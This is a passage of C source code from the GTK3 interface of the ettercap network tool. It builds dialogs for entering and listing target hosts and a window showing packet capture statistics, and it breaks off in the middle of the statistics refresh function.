*label, *grid, *content; GtkWidget *frame1, *frame2; GtkWidget *t1_mac, *t1_ip, *t1_port, *t2_mac, *t2_ip, *t2_port; gint nrows = 3; #ifdef WITH_IPV6 GtkWidget *t1_ipv6, *t2_ipv6; nrows = 4; #endif #define TARGET_LEN ETH_ASCII_ADDR_LEN + 1 + \ IP_ASCII_ADDR_LEN + 1 + \ IP6_ASCII_ADDR_LEN + 1 + \ 5 + 1 (void) action; (void) value; (void) data; DEBUG_MSG("gtk_select_targets"); dialog = gtk_dialog_new_with_buttons("Enter Targets", GTK_WINDOW(window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT | GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_set_border_width(GTK_CONTAINER(content), 20); frame1 = gtk_frame_new("Target 1"); gtk_container_add(GTK_CONTAINER(content), frame1); gtk_widget_set_margin_bottom(frame1, 10); frame2 = gtk_frame_new("Target 2"); gtk_container_add(GTK_CONTAINER(content), frame2); gtk_widget_set_margin_bottom(frame2, 20); grid = gtk_grid_new(); gtk_grid_set_row_spacing(GTK_GRID(grid), 5); gtk_grid_set_column_spacing(GTK_GRID(grid), 5); gtk_container_set_border_width(GTK_CONTAINER (grid), 8); gtk_container_add(GTK_CONTAINER (frame1), grid); label = gtk_label_new("MAC:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP, 1, 1); t1_mac = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t1_mac), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t1_mac), MAX_ASCII_ADDR_LEN); gtk_grid_attach(GTK_GRID(grid), t1_mac, GTK_POS_LEFT+1, GTK_POS_TOP, 1, 1); label = gtk_label_new("IP address:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+1, 1, 1); t1_ip = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t1_ip), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t1_ip), MAX_ASCII_ADDR_LEN); gtk_grid_attach(GTK_GRID(grid), t1_ip, GTK_POS_LEFT+1, GTK_POS_TOP+1, 1, 1); #ifdef WITH_IPV6 label = gtk_label_new("IPv6 address:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+2, 1, 1); t1_ipv6 = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t1_ipv6), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t1_ipv6), MAX_ASCII_ADDR_LEN); gtk_grid_attach(GTK_GRID(grid), t1_ipv6, GTK_POS_LEFT+1, GTK_POS_TOP+2, 1, 1); #endif label = gtk_label_new("Port:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+nrows, 1, 1); t1_port = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t1_port), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t1_port), MAX_ASCII_ADDR_LEN); gtk_grid_attach(GTK_GRID(grid), t1_port, GTK_POS_LEFT+1, GTK_POS_TOP+nrows, 1, 1); /* Fill previously set values */ if (EC_GBL_OPTIONS->target1) { gchar **tokens, **p; tokens = g_strsplit(EC_GBL_OPTIONS->target1, "/", nrows); p = tokens; /* MAC */ gtk_entry_set_text(GTK_ENTRY(t1_mac), *p++); /* IP address */ gtk_entry_set_text(GTK_ENTRY(t1_ip), *p++); #ifdef WITH_IPV6 /* IPv6 address */ gtk_entry_set_text(GTK_ENTRY(t1_ipv6), *p++); #endif /* Port */ gtk_entry_set_text(GTK_ENTRY(t1_port), *p); g_strfreev(tokens); } /* Target 2: */ grid = gtk_grid_new(); gtk_grid_set_row_spacing(GTK_GRID(grid), 5); gtk_grid_set_column_spacing(GTK_GRID(grid), 5); gtk_container_set_border_width(GTK_CONTAINER (grid), 8); gtk_container_add(GTK_CONTAINER (frame2), grid); label = gtk_label_new("MAC:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP, 1, 1); t2_mac = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t2_mac), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t2_mac), MAX_ASCII_ADDR_LEN); gtk_grid_attach(GTK_GRID(grid), t2_mac, GTK_POS_LEFT+1, GTK_POS_TOP, 1, 1); label = gtk_label_new("IP address:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+1, 1, 1); t2_ip = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t2_ip), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t2_ip), MAX_ASCII_ADDR_LEN); gtk_grid_attach(GTK_GRID(grid), t2_ip, GTK_POS_LEFT+1, GTK_POS_TOP+1, 1, 1); #ifdef WITH_IPV6 label = gtk_label_new("IPv6 address:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+2, 1, 1); t2_ipv6 = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t2_ipv6), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t2_ipv6), MAX_ASCII_ADDR_LEN); gtk_grid_attach(GTK_GRID(grid), t2_ipv6, GTK_POS_LEFT+1, GTK_POS_TOP+2, 1, 1); #endif label = gtk_label_new("Port:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+nrows, 1, 1); t2_port = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY(t2_port), MAX_ASCII_ADDR_LEN); gtk_entry_set_width_chars(GTK_ENTRY(t2_port), MAX_ASCII_ADDR_LEN); gtk_grid_attach(GTK_GRID(grid), t2_port, GTK_POS_LEFT+1, GTK_POS_TOP+nrows, 1, 1); /* Fill previously set values */ if (EC_GBL_OPTIONS->target2) { gchar **tokens, **p; tokens = g_strsplit(EC_GBL_OPTIONS->target2, "/", nrows); p = tokens; /* MAC */ gtk_entry_set_text(GTK_ENTRY(t2_mac), *p++); /* IP address */ gtk_entry_set_text(GTK_ENTRY(t2_ip), *p++); #ifdef WITH_IPV6 /* IPv6 address */ gtk_entry_set_text(GTK_ENTRY(t2_ipv6), *p++); #endif /* Port */ gtk_entry_set_text(GTK_ENTRY(t2_port), *p); g_strfreev(tokens); } gtk_widget_show_all(dialog); if (gtk_dialog_run (GTK_DIALOG (dialog)) == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); SAFE_FREE(EC_GBL_OPTIONS->target1); SAFE_FREE(EC_GBL_OPTIONS->target2); SAFE_CALLOC(EC_GBL_OPTIONS->target1, TARGET_LEN, sizeof(char)); SAFE_CALLOC(EC_GBL_OPTIONS->target2, TARGET_LEN, sizeof(char)); #ifdef WITH_IPV6 snprintf(EC_GBL_OPTIONS->target1, TARGET_LEN, "%s/%s/%s/%s", gtk_entry_get_text(GTK_ENTRY(t1_mac)), gtk_entry_get_text(GTK_ENTRY(t1_ip)), gtk_entry_get_text(GTK_ENTRY(t1_ipv6)), gtk_entry_get_text(GTK_ENTRY(t1_port))); snprintf(EC_GBL_OPTIONS->target2, TARGET_LEN, "%s/%s/%s/%s", gtk_entry_get_text(GTK_ENTRY(t2_mac)), gtk_entry_get_text(GTK_ENTRY(t2_ip)), gtk_entry_get_text(GTK_ENTRY(t2_ipv6)), gtk_entry_get_text(GTK_ENTRY(t2_port))); #else snprintf(EC_GBL_OPTIONS->target1, TARGET_LEN, "%s/%s/%s", gtk_entry_get_text(GTK_ENTRY(t1_mac)), gtk_entry_get_text(GTK_ENTRY(t1_ip)), gtk_entry_get_text(GTK_ENTRY(t1_port))); snprintf(EC_GBL_OPTIONS->target2, TARGET_LEN, "%s/%s/%s", gtk_entry_get_text(GTK_ENTRY(t2_mac)), gtk_entry_get_text(GTK_ENTRY(t2_ip)), gtk_entry_get_text(GTK_ENTRY(t2_port))); #endif set_targets(); } gtk_widget_destroy(dialog); } /* * set the targets */ static void set_targets(void) { /* delete the previous filters */ reset_display_filter(EC_GBL_TARGET1); reset_display_filter(EC_GBL_TARGET2); /* free empty filters */ if (!strcmp(EC_GBL_OPTIONS->target1, "")) SAFE_FREE(EC_GBL_OPTIONS->target1); /* free empty filters */ if (!strcmp(EC_GBL_OPTIONS->target2, "")) SAFE_FREE(EC_GBL_OPTIONS->target2); /* compile the filters */ compile_display_filter(); /* if the 'current targets' window is displayed, refresh it */ if (targets_window) gtkui_current_targets(NULL, NULL, NULL); } /* * display the list of current targets */ void gtkui_current_targets(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *scrolled, *treeview, *vbox, *hbox, *button; GtkCellRenderer *renderer; GtkTreeViewColumn *column; static gint delete_targets1 = 1; static gint delete_targets2 = 2; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_current_targets"); /* prepare the liststores for the target lists */ gtkui_create_targets_array(); if(targets_window) { if(GTK_IS_WINDOW (targets_window)) gtk_window_present(GTK_WINDOW (targets_window)); else gtkui_page_present(targets_window); return; } targets_window = gtkui_page_new("Targets", >kui_targets_destroy, >kui_targets_detach); vbox= gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_container_add(GTK_CONTAINER (targets_window), vbox); gtk_widget_show(vbox); hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); gtk_box_pack_start(GTK_BOX(vbox), hbox, TRUE, TRUE, 0); gtk_widget_show(hbox); /* list one */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(hbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), GTK_TREE_MODEL (liststore1)); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection1 = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection1, GTK_SELECTION_MULTIPLE); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Target 1", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); /* list two */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(hbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), GTK_TREE_MODEL (liststore2)); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection2 = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection2, GTK_SELECTION_MULTIPLE); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Target 2", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); /* buttons */ hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); button = gtk_button_new_with_mnemonic("Delete"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_delete_targets), &delete_targets1); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); button = gtk_button_new_with_mnemonic("Add"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_add_target1), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); button = gtk_button_new_with_mnemonic("Delete"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_delete_targets), &delete_targets2); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); button = gtk_button_new_with_mnemonic("Add"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_add_target2), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show_all(hbox); gtk_widget_show(targets_window); } static void gtkui_targets_detach(GtkWidget *child) { targets_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (targets_window), "Current Targets"); gtk_window_set_default_size(GTK_WINDOW (targets_window), 400, 300); g_signal_connect (G_OBJECT (targets_window), "delete_event", G_CALLBACK (gtkui_targets_destroy), NULL); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(targets_window, gtkui_targets_attach); gtk_container_add(GTK_CONTAINER (targets_window), child); gtk_window_present(GTK_WINDOW (targets_window)); } static void gtkui_targets_attach(void) { gtkui_targets_destroy(); gtkui_current_targets(NULL, NULL, NULL); } static void gtkui_targets_destroy(void) { gtk_widget_destroy(targets_window); targets_window = NULL; } /* * create the array for the widget. * erase any previously alloc'd array */ void gtkui_create_targets_array(void) { GtkTreeIter iter; struct ip_list *il; char tmp[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("gtk_create_targets_array"); if(liststore1) gtk_list_store_clear(GTK_LIST_STORE (liststore1)); else liststore1 = gtk_list_store_new (2, G_TYPE_STRING, G_TYPE_POINTER); /* walk TARGET 1 */ LIST_FOREACH(il, &EC_GBL_TARGET1->ips, next) { /* enlarge the array */ gtk_list_store_append (liststore1, &iter); /* fill the element */ gtk_list_store_set (liststore1, &iter, 0, ip_addr_ntoa(&il->ip, tmp), 1, il, -1); } #ifdef WITH_IPV6 /* walk TARGET 1 - IPv6 */ LIST_FOREACH(il, &EC_GBL_TARGET1->ip6, next) { /* enlarge the array */ gtk_list_store_append (liststore1, &iter); /* fill the element */ gtk_list_store_set (liststore1, &iter, 0, ip_addr_ntoa(&il->ip, tmp), 1, il, -1); } #endif if(liststore2) gtk_list_store_clear(GTK_LIST_STORE (liststore2)); else liststore2 = gtk_list_store_new (2, G_TYPE_STRING, G_TYPE_POINTER); /* walk TARGET 2 */ LIST_FOREACH(il, &EC_GBL_TARGET2->ips, next) { /* enlarge the array */ gtk_list_store_append (liststore2, &iter); /* fill the element */ gtk_list_store_set (liststore2, &iter, 0, ip_addr_ntoa(&il->ip, tmp), 1, il, -1); } #ifdef WITH_IPV6 /* walk TARGET 2 - IPv6 */ LIST_FOREACH(il, &EC_GBL_TARGET2->ip6, next) { /* enlarge the array */ gtk_list_store_append (liststore2, &iter); /* fill the element */ gtk_list_store_set (liststore2, &iter, 0, ip_addr_ntoa(&il->ip, tmp), 1, il, -1); } #endif } /* * display the "add host" dialog */ static void gtkui_add_target1(void *entry) { /* variable not used */ (void) entry; DEBUG_MSG("gtk_add_target1"); gtkui_input("IP address :", thost, MAX_ASCII_ADDR_LEN, add_target1); } static void gtkui_add_target2(void *entry) { /* variable not used */ (void) entry; DEBUG_MSG("gtk_add_target2"); gtkui_input("IP address :", thost, MAX_ASCII_ADDR_LEN, add_target2); } static void add_target1(void) { struct ip_addr host; if (ip_addr_pton(thost, &host) != E_SUCCESS) { /* neither IPv4 nor IPv6 - inform user */ gtkui_message("Invalid ip address"); return; } add_ip_list(&host, EC_GBL_TARGET1); /* refresh the list */ gtkui_create_targets_array(); } static void add_target2(void) { struct ip_addr host; if (ip_addr_pton(thost, &host) != E_SUCCESS) { /* neither IPv4 nor IPv6 - inform user */ gtkui_message("Invalid ip address"); return; } add_ip_list(&host, EC_GBL_TARGET2); /* refresh the list */ gtkui_create_targets_array(); } static void gtkui_delete_targets(GtkWidget *widget, gpointer data) { GList *list = NULL; GtkTreeIter iter; GtkTreeModel *model; struct ip_list *il = NULL; gint *type = data; /* variable not used */ (void) widget; if (type == NULL) return; switch(*type) { case 1: DEBUG_MSG("gtkui_delete_target: list 1"); model = GTK_TREE_MODEL (liststore1); if(gtk_tree_selection_count_selected_rows(selection1) > 0) { list = gtk_tree_selection_get_selected_rows (selection1, &model); for(list = g_list_last(list); list; list = g_list_previous(list)) { gtk_tree_model_get_iter(model, &iter, list->data); gtk_tree_model_get (model, &iter, 1, &il, -1); /* remove the host from the list */ del_ip_list(&il->ip, EC_GBL_TARGET1); gtk_list_store_remove(GTK_LIST_STORE (liststore1), &iter); } } break; case 2: DEBUG_MSG("gtkui_delete_target: list 2"); model = GTK_TREE_MODEL (liststore2); if(gtk_tree_selection_count_selected_rows(selection2) > 0) { list = gtk_tree_selection_get_selected_rows (selection2, &model); for(list = g_list_last(list); list; list = g_list_previous(list)) { gtk_tree_model_get_iter(model, &iter, list->data); gtk_tree_model_get (model, &iter, 1, &il, -1); /* remove the host from the list */ del_ip_list(&il->ip, EC_GBL_TARGET2); gtk_list_store_remove(GTK_LIST_STORE (liststore2), &iter); } } break; } /* free the list of selections */ if(list) { g_list_free_full(list, (GDestroyNotify)gtk_tree_path_free); } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_view.c000664 000000 000000 00000051265 13711276346 021772 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* proto */ static void gtkui_set_regex(void); static void gtkui_set_wifikey(void); static void gtkui_stop_stats(void); static void gtkui_stats_detach(GtkWidget *child); static void gtkui_stats_attach(void); static gboolean refresh_stats(gpointer data); /* globals */ #define VLEN 8 static char vmethod[VLEN] = "ascii"; #define RLEN 50 static char vregex[RLEN]; #define WLEN 70 static char wkey[WLEN]; static guint stats_idle; /* for removing the idle call */ /* for stats window */ static GtkWidget *stats_window, *packets_recv, *packets_drop, *packets_forw, *queue_len, *sample_rate, *recv_bottom, *recv_top, *interesting, *rate_bottom, *rate_top, *through_bottom, *through_top; /*******************************************/ /* * If this option is being activated, * it runs through the current hosts list and triggeres * name resolution in the background. * That way subsequent actions benefits from the filled cache */ void toggle_resolve(GSimpleAction *action, GVariant *value, gpointer data) { char name[MAX_HOSTNAME_LEN]; struct hosts_list *hl; (void) data; g_simple_action_set_state(action, value); /* resolution already set */ if (EC_GBL_OPTIONS->resolve) { EC_GBL_OPTIONS->resolve = 0; resolv_thread_fini(); return; } DEBUG_MSG("toggle_resolve: activate name resolution"); /* set the option and activate resolution threads */ EC_GBL_OPTIONS->resolve = 1; resolv_thread_init(); /* run through the current hosts list and trigger resolution */ LIST_FOREACH(hl, &EC_GBL_HOSTLIST, next) { if (hl->hostname) continue; host_iptoa(&hl->ip, name); } /* actually refresh the host list */ EC_GBL_UI->update(UI_UPDATE_HOSTLIST); } /* * display the statistics windows */ void gtkui_show_stats(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *grid, *label; (void) action; (void) value; (void) data; DEBUG_MSG("gtkui_show_stats"); /* if the object already exist, set the focus to it */ if (stats_window) { /* show stats window */ if(GTK_IS_WINDOW (stats_window)) gtk_window_present(GTK_WINDOW (stats_window)); else gtkui_page_present(stats_window); return; } stats_window = gtkui_page_new("Statistics", >kui_stop_stats, >kui_stats_detach); /* alright, this is a lot of code but it'll keep everything lined up nicely */ grid = gtk_grid_new(); gtk_grid_set_column_homogeneous(GTK_GRID(grid), TRUE); gtk_grid_set_column_spacing(GTK_GRID(grid), 10); gtk_container_add(GTK_CONTAINER (stats_window), grid); label = gtk_label_new( "Received packets:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP, 1, 1); packets_recv = gtk_label_new(" "); gtk_label_set_selectable(GTK_LABEL (packets_recv), TRUE); gtk_widget_set_halign(packets_recv, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), packets_recv, GTK_POS_LEFT+1, GTK_POS_TOP, 1, 1); label = gtk_label_new("Dropped packets:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+1, 1, 1); packets_drop = gtk_label_new(" "); gtk_label_set_selectable(GTK_LABEL (packets_drop), TRUE); gtk_widget_set_halign(packets_drop, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), packets_drop, GTK_POS_LEFT+1, GTK_POS_TOP+1, 1, 1); label = gtk_label_new("Forwarded packets:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+2, 1, 1); packets_forw = gtk_label_new(" 0 bytes: 0 "); gtk_label_set_selectable(GTK_LABEL (packets_forw), TRUE); gtk_widget_set_halign(packets_forw, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), packets_forw, GTK_POS_LEFT+1, GTK_POS_TOP+2, 1 ,1); label = gtk_label_new("Current queue length:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+3, 1, 1); queue_len = gtk_label_new("0/0 "); gtk_label_set_selectable(GTK_LABEL (queue_len), TRUE); gtk_widget_set_halign(queue_len, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), queue_len, GTK_POS_LEFT+1, GTK_POS_TOP+3, 1, 1); label = gtk_label_new("Sampling rate:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+4, 1, 1); sample_rate = gtk_label_new("0 "); gtk_label_set_selectable(GTK_LABEL (sample_rate), TRUE); gtk_widget_set_halign(sample_rate, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), sample_rate, GTK_POS_LEFT+1, GTK_POS_TOP+4, 1, 1); label = gtk_label_new("Bottom Half received packet:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+5, 1, 1); recv_bottom = gtk_label_new("pck: 0 bytes: 0"); gtk_label_set_selectable(GTK_LABEL (recv_bottom), TRUE); gtk_widget_set_halign(recv_bottom, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), recv_bottom, GTK_POS_LEFT+1 ,GTK_POS_TOP+5, 1, 1); label = gtk_label_new("Top Half received packet:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+6, 1, 1); recv_top = gtk_label_new("pck: 0 bytes: 0"); gtk_label_set_selectable(GTK_LABEL (recv_top), TRUE); gtk_widget_set_halign(recv_top, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), recv_top, GTK_POS_LEFT+1, GTK_POS_TOP+6, 1, 1); label = gtk_label_new("Interesting packets:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+7, 1, 1); interesting = gtk_label_new("0.00 %"); gtk_label_set_selectable(GTK_LABEL (interesting), TRUE); gtk_widget_set_halign(interesting, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), interesting, GTK_POS_LEFT+1, GTK_POS_TOP+7, 1, 1); label = gtk_label_new("Bottom Half packet rate:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+8, 1, 1); rate_bottom = gtk_label_new("worst: 0 adv: 0 b/s"); gtk_label_set_selectable(GTK_LABEL (rate_bottom), TRUE); gtk_widget_set_halign(rate_bottom, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), rate_bottom, GTK_POS_LEFT+1, GTK_POS_TOP+8, 1, 1); label = gtk_label_new("Top Half packet rate:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+9, 1, 1); rate_top = gtk_label_new("worst: 0 adv: 0 b/s"); gtk_label_set_selectable(GTK_LABEL (rate_top), TRUE); gtk_widget_set_halign(rate_top, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), rate_top, GTK_POS_LEFT+1, GTK_POS_TOP+9, 1, 1); label = gtk_label_new("Bottom Half throughput:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+10, 1, 1); through_bottom = gtk_label_new("worst: 0 adv: 0 b/s"); gtk_label_set_selectable(GTK_LABEL (through_bottom), TRUE); gtk_widget_set_halign(through_bottom, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), through_bottom, GTK_POS_LEFT+1, GTK_POS_TOP+10, 1, 1); label = gtk_label_new("Top Half throughput:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+11, 1, 1); through_top = gtk_label_new("worst: 0 adv: 0 b/s"); gtk_label_set_selectable(GTK_LABEL (through_top), TRUE); gtk_widget_set_halign(through_top, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), through_top, GTK_POS_LEFT+1, GTK_POS_TOP+11, 1, 1); gtk_widget_show_all(grid); gtk_widget_show(stats_window); /* display the stats */ refresh_stats(NULL); /* refresh the stats window every 200 ms */ /* GTK has a gtk_idle_add also but it calls too much and uses 100% cpu */ stats_idle = g_timeout_add(200, refresh_stats, NULL); } static void gtkui_stats_detach(GtkWidget *child) { stats_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (stats_window), "Statistics"); gtk_container_set_border_width(GTK_CONTAINER (stats_window), 10); g_signal_connect (G_OBJECT (stats_window), "delete_event", G_CALLBACK (gtkui_stop_stats), NULL); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(stats_window, gtkui_stats_attach); gtk_container_add(GTK_CONTAINER (stats_window), child); gtk_window_present(GTK_WINDOW (stats_window)); } static void gtkui_stats_attach(void) { gtkui_stop_stats(); gtkui_show_stats(NULL, NULL, NULL); } static void gtkui_stop_stats(void) { DEBUG_MSG("gtk_stop_stats"); g_source_remove(stats_idle); gtk_widget_destroy(stats_window); stats_window = NULL; } static gboolean refresh_stats(gpointer data) { char line[50]; /* variable not used */ (void) data; /* if not focused don't refresh it */ /* this also removes the idle call, but should only occur if the window isn't visible */ if (!gtk_widget_get_visible(stats_window)) return FALSE; snprintf(line, 50, "%8"PRIu64, EC_GBL_STATS->ps_recv); gtk_label_set_text(GTK_LABEL (packets_recv), line); snprintf(line, 50, "%8"PRIu64" %.2f %%", EC_GBL_STATS->ps_drop, (EC_GBL_STATS->ps_recv) ? (float)EC_GBL_STATS->ps_drop * 100 / EC_GBL_STATS->ps_recv : 0 ); gtk_label_set_text(GTK_LABEL (packets_drop), line); snprintf(line, 50, "%8"PRIu64" bytes: %8"PRIu64" ", EC_GBL_STATS->ps_sent, EC_GBL_STATS->bs_sent); gtk_label_set_text(GTK_LABEL (packets_forw), line); snprintf(line, 50, "%lu/%lu ", EC_GBL_STATS->queue_curr, EC_GBL_STATS->queue_max); gtk_label_set_text(GTK_LABEL (queue_len), line); snprintf(line, 50, "%d ", EC_GBL_CONF->sampling_rate); gtk_label_set_text(GTK_LABEL (sample_rate), line); snprintf(line, 50, "pck: %8"PRIu64" bytes: %8"PRIu64, EC_GBL_STATS->bh.pck_recv, EC_GBL_STATS->bh.pck_size); gtk_label_set_text(GTK_LABEL (recv_bottom), line); snprintf(line, 50, "pck: %8"PRIu64" bytes: %8"PRIu64, EC_GBL_STATS->th.pck_recv, 